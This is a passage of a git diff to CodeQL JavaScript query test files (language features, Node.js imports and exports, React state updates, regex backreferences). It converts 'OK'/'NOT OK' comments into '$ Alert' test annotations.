parseFloat("123", 10); } })(); } - notAPlainThrower1(42); // NOT OK - notAPlainThrower2(42); // NOT OK - notAPlainThrower3(42); // NOT OK - thrower(42); // OK - throwerArrow(42); // OK - throwerCustom(42); // OK - throwerWithParam(42, 87); // NOT OK - throwerIndirect(42); // OK, but still flagged due to complexity + notAPlainThrower1(42); // $ Alert + notAPlainThrower2(42); // $ Alert + notAPlainThrower3(42); // $ Alert + thrower(42); + throwerArrow(42); + throwerCustom(42); + throwerWithParam(42, 87); // $ Alert + throwerIndirect(42); // OK - but still flagged due to complexity }); function sum2() { @@ -128,14 +125,14 @@ function sum2() { return result; } -// OK + sum2(1, 2, 3); const $ = function (x, arr) { console.log(x, arr); }; -// OK + async function tagThing(repoUrl, directory) { await $`git clone ${repoUrl} ${directory}`; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js index 583daac6ccca..6965cab8bae0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js @@ -1,25 +1,20 @@ var o = { A: function f(x) { 'use strict'; - // BAD - if (!(this instanceof arguments.callee)) - // BAD - return new arguments.callee(x); - // BAD - console.log(f.caller); - // BAD - this.y = f.arguments; + if (!(this instanceof arguments.callee)) // $ Alert + return new arguments.callee(x); // $ Alert + console.log(f.caller); // $ Alert + this.y = f.arguments; // $ Alert this.x = x; } }; var D = class extends function() { - // BAD - return arguments.callee; + return arguments.callee; // $ Alert } {}; function g() { - // OK + return arguments.caller.length; } @@ -27,8 +22,7 @@ function g() { 'use strict'; function h() { var foo = Math.random() > 0.5 ? h : arguments; - // BAD - return foo.caller; + return foo.caller; // $ Alert } })(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js index 65a61da7a616..6ea353f77b5e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js @@ -37,7 +37,7 @@ function foo1() { const foobar = 4; const data = {name: name, date: date}; - writer.emit("Name: ${name}, Date: ${date}.", data); // OK + writer.emit("Name: ${name}, Date: ${date}.", data); - writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // NOT OK - `foobar` is not in `data`. + writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // $ Alert - `foobar` is not in `data`. } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js index a68f3ad35f9b..7a61221e8a90 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js @@ -1,6 +1,5 @@ function idMaker(){ var index = 0; while(true) - // NOT OK - yield index++; + yield index++; // $ Alert } diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js index b4645ff98881..d7799470bc2f 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js @@ -20,7 +20,7 @@ k.foo; var l = require('./l'); l.foo(); -l.bar(); // not OK +l.bar(); // $ Alert require('./m').foo; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js index cacb69772fe9..7eb45e2cfabb 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js @@ -10,10 +10,10 @@ if (cond) { } if (cond) { - mod1.call(); // OK: `mod1` is `./b`, which exports `call` + mod1.call(); // OK - `mod1` is `./b`, which exports `call` } else { - mod1.bar; // OK: `mod1` is `./c`, which exports `bar` - mod2.bar; // NOT OK: `mod2` is `./b`, which does not export `call` + mod1.bar; // OK - `mod1` is `./c`, which exports `bar` + mod2.bar; // $ Alert - `mod2` is `./b`, which does not export `call` } module.exports = {}; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js index 83bd3009a8ba..61a2663a7ad6 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js @@ -1,2 +1,2 @@ -exports.a = 23; // OK -exports = 56; // NOT OK +exports.a = 23; +exports = 56; // $ Alert diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js index c650950972b5..f02b2cdaa4f7 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = module.exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js index 67a979faef7a..f3c20feff45f 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` module.exports = exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js index 18089f129a6e..d7269a450093 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js @@ -1,4 +1,4 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = {}; exports.a = 23; module.exports = exports; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js index 93448cd102f9..78ea98c06292 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query exports = module.exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js index 679437bd5b9d..e638381c2690 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query module.exports = exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js index c24fd42b6dd9..2a5f22cb49d8 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js @@ -1,2 +1,2 @@ -module.exports.a = 23; // OK -module.exports = 56; // OK +module.exports.a = 23; +module.exports = 56; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js index 4b93bb8f7f40..9361a968088c 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js @@ -1,4 +1,4 @@ module.exports = exports; -exports = {}; // NOT OK, reassignment above should appear below +exports = {}; // $ Alert - reassignment above should appear below exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js index d91971d6f519..cf5eb12ff0ac 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js @@ -1,4 +1,4 @@ var e = {}; module.exports = e; -exports = e; // OK +exports = e; exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js b/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js index 9a561d4a340d..8023c7511b64 100644 --- a/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js @@ -4,19 +4,19 @@ exports.baz = 56; exports.alert = 72; /*global bar*/ -bar(); // OK +bar(); baz = function() {}; -baz(); // OK +baz(); -alert(); // OK +alert(); -exports.isNaN = isNaN // OK +exports.isNaN = isNaN || function(x) { return x !== x; }; exports.someGlobal = 100; -someGlobal(); // OK +someGlobal(); window.otherGlobal = function() {}; exports.otherGlobal = otherGlobal; -otherGlobal(); // OK +otherGlobal(); diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js index 750fbe53712d..9e6301b5bb38 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js @@ -1,2 +1,2 @@ -require('baz'); // OK: declared in ../../package.json (though not in ./package.json) -require('mod'); // OK: found in ../node_modules/mod \ No newline at end of file +require('baz'); // OK - declared in ../../package.json (though not in ./package.json) +require('mod'); // OK - found in ../node_modules/mod \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js index ba7d097a552e..abc92ca81047 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js @@ -1,2 +1,2 @@ -require('baz'); // OK: declared in ../package.json -require('mod'); // OK: found in ./node_modules/mod \ No newline at end of file +require('baz'); // OK - declared in ../package.json +require('mod'); // OK - found in ./node_modules/mod \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js index 878d59a100d4..b5d9982bd4e0 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js @@ -1,11 +1,11 @@ -require('fs'); // OK: there is an externs file for it -require('other'); // NOT OK: there is an externs file, but it is not a Node.js module -require('foo'); // OK: declared as a dependency -require('bar/sub'); // OK: 'bar' declared as a dependency -require('./local'); // OK: local import -require('/global'); // OK: global import -require('mod'); // NOT OK -require('undeclared'); // NOT OK -require('jade!./template.jade'); // OK: WebPack loader -require('imports?$=jquery!./m.js'); // OK: WebPack shim -require('react'); // OK: peer dependency \ No newline at end of file +require('fs'); // OK - there is an externs file for it +require('other'); // $ Alert - there is an externs file, but it is not a Node.js module +require('foo'); // OK - declared as a dependency +require('bar/sub'); // OK - 'bar' declared as a dependency +require('./local'); // OK - local import +require('/global'); // OK - global import +require('mod'); // $ Alert +require('undeclared'); // $ Alert +require('jade!./template.jade'); // OK - WebPack loader +require('imports?$=jquery!./m.js'); // OK - WebPack shim +require('react'); // OK - peer dependency \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js index ae78d6699400..b11ad45452ef 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js @@ -1 +1 @@ -require('m'); // OK: no package.json, so assume incomplete code and don't flag \ No newline at end of file +require('m'); // OK - no package.json, so assume incomplete code and don't flag \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js b/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js index c379b0ba530e..4ab65194e8df 100644 --- a/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js +++ b/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js @@ -1,27 +1,24 @@ var o = { x: 1, y: 2, z: 3 }; -// OK: toplevel for-in +// OK - toplevel for-in for (var p in o); function f() { - // OK: local variable + // OK - local variable for (var p in o); } function g() { - // NOT OK: property - var q = [], i = 0; + var q = [], i = 0; // $ Alert - property for (q[i++] in o); } function h() { - // NOT OK: global - for (p in o); + for (p in o); // $ Alert - global } function k() { - // NOT OK: captured - for (var p in o); + for (var p in o); // $ Alert - captured return function() { return p; }; @@ -30,15 +27,13 @@ function k() { function l() { var p; function m() { - // NOT OK: captured - for (p in o); + for (p in o); // $ Alert - captured } } function m() { - // NOT OK: global - for (p of o); + for (p of o); // $ Alert - global } -// OK: toplevel +// OK - toplevel for (p of o); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js index 577fc79d5879..efe3e1cd14b0 100644 --- a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js +++ b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js @@ -1,5 +1,4 @@ -// NOT OK -function sum(xs, start) { +function sum(xs, start) { // $ Alert if (arguments.length < 2) start = 0; @@ -10,7 +9,7 @@ function sum(xs, start) { return sum; } -// OK + function sum(xs, start) { if (typeof start === 'undefined') start = 0; @@ -22,7 +21,7 @@ function sum(xs, start) { return sum; } -// OK + function sum(xs, _start) { var start = arguments.length < 2 ? _start : 0; diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js index 835818f144d7..9e87ae3819bc 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js @@ -1,7 +1,7 @@ class C1 extends React.Component { upd8() { this.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -9,7 +9,7 @@ class C1 extends React.Component { class C2 extends React.Component { upd8() { this.setState((prevState) => { - counter: prevState.counter + 1 // OK + counter: prevState.counter + 1 }); } } @@ -18,7 +18,7 @@ class C3 extends React.Component { upd8() { var app = this; app.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -26,7 +26,7 @@ class C3 extends React.Component { class C4 extends React.Component { upd8() { this.setState({ - counter: this.state.foo // NOT OK + counter: this.state.foo // $ Alert }); } } @@ -34,7 +34,7 @@ class C4 extends React.Component { class C5 extends React.Component { upd8() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } } @@ -42,13 +42,13 @@ class C5 extends React.Component { class C7 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } @@ -56,13 +56,13 @@ class C7 extends React.Component { class C8 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo + 1 // NOT OK + foo: this.state.foo + 1 // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo + 1 // NOT OK + foo: this.state.foo + 1 // $ Alert }); } } @@ -70,13 +70,13 @@ class C8 extends React.Component { class C9 extends React.Component { upd8a() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } upd8b() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } } @@ -84,14 +84,14 @@ class C9 extends React.Component { class C10 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo, // NOT OK - bar: this.state.bar // NOT OK, but ignored because it is safe in practice + foo: this.state.foo, // $ Alert }); + bar: this.state.bar // OK - ignored because it is safe in practice } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } @@ -100,13 +100,13 @@ class C11 extends React.Component { upd8a() { var self = this; self.setState({ - foo: self.state.foo // NOT OK + foo: self.state.foo // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js index f3c488d38b62..28cd077964f6 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js +++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js @@ -1,9 +1,9 @@ // update variants React.createClass({ render: function() { - this.setState({}); // NOT OK - this.replaceState({}); // NOT OK - this.forceUpdate({}); // NOT OK + this.setState({}); // $ Alert + this.replaceState({}); // $ Alert + this.forceUpdate({}); // $ Alert return
} }); @@ -14,8 +14,8 @@ class MyClass1 extends React.Component { super(props); } render() { - this.indirectUpdate(); // NOT OK - this.veryIndirectUpdate(); // NOT OK + this.indirectUpdate(); // $ Alert + this.veryIndirectUpdate(); // $ Alert return
} @@ -34,24 +34,24 @@ class MyClass1 extends React.Component { // definiteness variants React.createClass({ render: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert }, componentDidUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, shouldComponentUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, componentWillUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } } }); @@ -63,11 +63,11 @@ class MyClass2 extends React.Component { } componentWillUpdate() { - this.definiteIndirectUpdate(); // NOT OK + this.definiteIndirectUpdate(); // $ Alert if (cond) { - this.definiteIndirectUpdate(); // OK + this.definiteIndirectUpdate(); } - this.indefiniteIndirectUpdate(); // OK + this.indefiniteIndirectUpdate(); return
} @@ -86,7 +86,7 @@ class MyClass2 extends React.Component { React.createClass({ render: function() { var app = this; - app.setState({}); // NOT OK + app.setState({}); // $ Alert return
} }); @@ -105,7 +105,7 @@ React.createClass({ // eslint examples React.createClass({ componentDidUpdate: function() { - this.setState({ // NOT OK + this.setState({ // $ Alert name: this.props.name.toUpperCase() }); }, @@ -115,7 +115,7 @@ React.createClass({ }); React.createClass({ componentWillUpdate: function() { - this.setState({ // NOT OK + this.setState({ // $ Alert name: this.props.name.toUpperCase() }); }, @@ -138,7 +138,7 @@ class Search extends React.Component { render() { return ( - // NOT OK + // $ Alert ); } } @@ -147,25 +147,25 @@ class Search extends React.Component { class MyClass3 extends React.Component { constructor(props) { super(props); - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentDidUnmount() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getDefaultProps() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getInitialState() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentWillUnmount() { - this.setState({}); // OK + this.setState({}); } componentWillMount() { - this.setState({}); // OK + this.setState({}); } componentDidMount() { - this.setState({}); // OK + this.setState({}); } } @@ -184,8 +184,8 @@ class MyClass4 extends React.Component { var doUpdate4 = () => this.myUpdate(); doUpdate4(); } - doUpdate1(); // NOT OK - doUpdate2(); // NOT OK - doUpdate3(); // NOT OK + doUpdate1(); // $ Alert + doUpdate2(); // $ Alert + doUpdate3(); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 6db5702e2fcf..acb79317790e 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -4,11 +4,11 @@ class C1 extends React.Component { this.setState({ writtenInSetState: 42 }); - this.state.writtenInOtherMethod; // OK - this.state.notWritten; // NOT OK - this.state.notWrittenButReadInChain; // NOT OK - this.state.writtenDirectly; // OK - this.state.writtenInSetState; // OK + this.state.writtenInOtherMethod; + this.state.notWritten; // $ Alert + this.state.notWrittenButReadInChain; // $ Alert + this.state.writtenDirectly; + this.state.writtenInSetState; } @@ -23,16 +23,16 @@ class C2 extends React.Component { s.writtenWhenEscaped = 42; } f(this.state); - this.state.writtenWhenEscaped; // OK - this.state.notWrittenWhenEscaped; // NOT OK, but ignored to avoid FP above + this.state.writtenWhenEscaped; + this.state.notWrittenWhenEscaped; // OK - ignored to avoid FP above } } class C3 extends React.Component { constructor() { - this.state.writtenThrougExternalPropertyAccess; // OK - this.state.notWrittenThrougExternalPropertyAccess; // NOT OK + this.state.writtenThrougExternalPropertyAccess; + this.state.notWrittenThrougExternalPropertyAccess; // $ Alert } } @@ -44,24 +44,24 @@ class C4 extends React.Component { return { writtenInUnknownInitializerObject: 42 }; } this.state = f(); - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } class C5 extends React.Component { constructor(x) { this.state = x; - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } new C5({writtenInUnknownInitializerObject: 42}); React.createClass({ render: function() { - this.state.writtenInKnownInitializerObject; // OK - this.state.notWrittenInKnownInitializerObject; // NOT OK + this.state.writtenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ Alert return
; }, getInitialState: function() { @@ -74,8 +74,8 @@ React.createClass({ function f(){ return { writtenInUnknownInitializerObject: 42 }; } - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above return
; }, getInitialState: function() { @@ -86,8 +86,8 @@ React.createClass({ class C6 extends React.Component { constructor(x) { Object.assign(this.state, {writtenInObjectAssign: 42}); - this.state.writtenInObjectAssign; // OK - this.state.notWrittenInObjectAssign; // NOT OK, but ignored to avoid FP above + this.state.writtenInObjectAssign; + this.state.notWrittenInObjectAssign; // OK - ignored to avoid FP above } } @@ -96,8 +96,8 @@ class C6 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenSetState; // OK - this.state.notWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenSetState; + this.state.notWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -107,7 +107,7 @@ class C7 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenInSetState; // OK + this.state.writtenInSetState; this.setState(f); } } @@ -120,8 +120,8 @@ class C8 extends React.Component { function g() { return { writtenInSetState: 42 } } - this.state.writtenInSetState; // OK - this.state.notInWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenInSetState; + this.state.notInWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -131,8 +131,8 @@ class C9 extends React.Component { function f() { return "readThroughUnknownDynamicPropertyAccess"; } this.state[f()] = 42; - this.state.writtenThroughUnknownDynamicPropertyAccess; // OK - this.state.notWrittenThroughUnknownDynamicPropertyAccess; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownDynamicPropertyAccess; + this.state.notWrittenThroughUnknownDynamicPropertyAccess; // OK - ignored to avoid FP above } } @@ -141,15 +141,15 @@ class C10 extends React.Component { constructor() { var x = { writtenThroughUnknownSpreadAccess: 42 }; this.state = { ...x }; - this.state.writtenThroughUnknownSpreadAccess; // OK - this.state.notWrittenThroughUnknownSpreadAccess// NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownSpreadAccess; + this.state.notWrittenThroughUnknownSpreadAccess// OK - ignored to avoid FP above } } React.createClass({ render: function() { - this.state.writtenThroughMixin; // OK - this.state.notWrittenThroughMixin; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughMixin; + this.state.notWrittenThroughMixin; // OK - ignored to avoid FP above return

Hello

; }, @@ -163,6 +163,6 @@ class C11 extends React.Component { } otherMethod() { - this.state.writeIn_getDerivedStateFromProps; // OK + this.state.writeIn_getDerivedStateFromProps; } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d71aa7136da9..d2ff35967673 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ class C1 extends React.Component { constructor() { - this.state.readDirectly = 42; // OK - this.state.readInChain = {}; // OK - this.state.readInOtherMethod = {}; // OK - this.state.notRead = 42; // NOT OK + this.state.readDirectly = 42; + this.state.readInChain = {}; + this.state.readInOtherMethod = {}; + this.state.notRead = 42; // $ Alert this.state.readDirectly; this.state.readInChain.foo; } @@ -18,7 +18,7 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // NOT OK + this.state.readWhenEscaped = 42; // $ Alert f(this.state); } } @@ -26,8 +26,8 @@ class C2 extends React.Component { class C3 extends React.Component { constructor() { - this.state.readThrougExternaPropertyAccess = 42; // OK - this.state.notReadThrougExternaPropertyAccess = 42; // NOT OK + this.state.readThrougExternaPropertyAccess = 42; + this.state.notReadThrougExternaPropertyAccess = 42; // $ Alert } } @@ -36,8 +36,8 @@ new C3().state.readThrougExternaPropertyAccess; class C4 extends React.Component { constructor() { function f() { return "readThroughUnknownDynamicPropertyAccess"; } - this.state.readThroughUnknownDynamicPropertyAccess = 42; // OK - this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughUnknownDynamicPropertyAccess = 42; + this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // $ OK - ignored to avoid FP above this.state[f()]; } @@ -46,15 +46,15 @@ class C4 extends React.Component { class C5 extends React.Component { constructor() { - this.state.readThroughSpreadOperator = 42; // OK + this.state.readThroughSpreadOperator = 42; ({...this.state}); } } React.createClass({ render: function() { - this.state.readThroughMixin = 42; // OK - this.state.notReadThroughMixin = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughMixin = 42; + this.state.notReadThroughMixin = 42; // $ OK - ignored to avoid FP above return

Hello

; }, @@ -68,7 +68,7 @@ class C6 extends React.Component { } constructor() { - this.state.readIn_getDerivedStateFromProps = 42; // OK + this.state.readIn_getDerivedStateFromProps = 42; } } diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js index 2ac332dfb38d..83fd7871d4ed 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js @@ -1,9 +1,9 @@ -/\1(abc)/; // NOT OK -/(a\1c)/; // NOT OK -/(ab)\2(c)/; // NOT OK -/(?:ab)\1(c)/; // NOT OK +/\1(abc)/; // $ Alert +/(a\1c)/; // $ Alert +/(ab)\2(c)/; // $ Alert +/(?:ab)\1(c)/; // $ Alert /(abc)\1/; /]*>((?:(?=([^<]+))\2|<(?!tpl\b[^>]*>))*?)<\/tpl>/; -/\k(?\w+)/; // NOT OK -/(?<=\1(.))a/; // OK -/(?<=(.)\1)a/; // NOT OK, but not currently flagged +/\k(?\w+)/; // $ Alert +/(?<=\1(.))a/; +/(?<=(.)\1)a/; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js index b2199e311374..7cf1ff3629b5 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js @@ -1,4 +1,3 @@ -// OK + /(.*?)a(?!(a+)b\2)/; -// NOT OK -/(.*?)a(?!(a+)b)\2(.*)/; +/(.*?)a(?!(a+)b)\2(.*)/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js index 59114b90c54a..942331c5453c 100644 --- 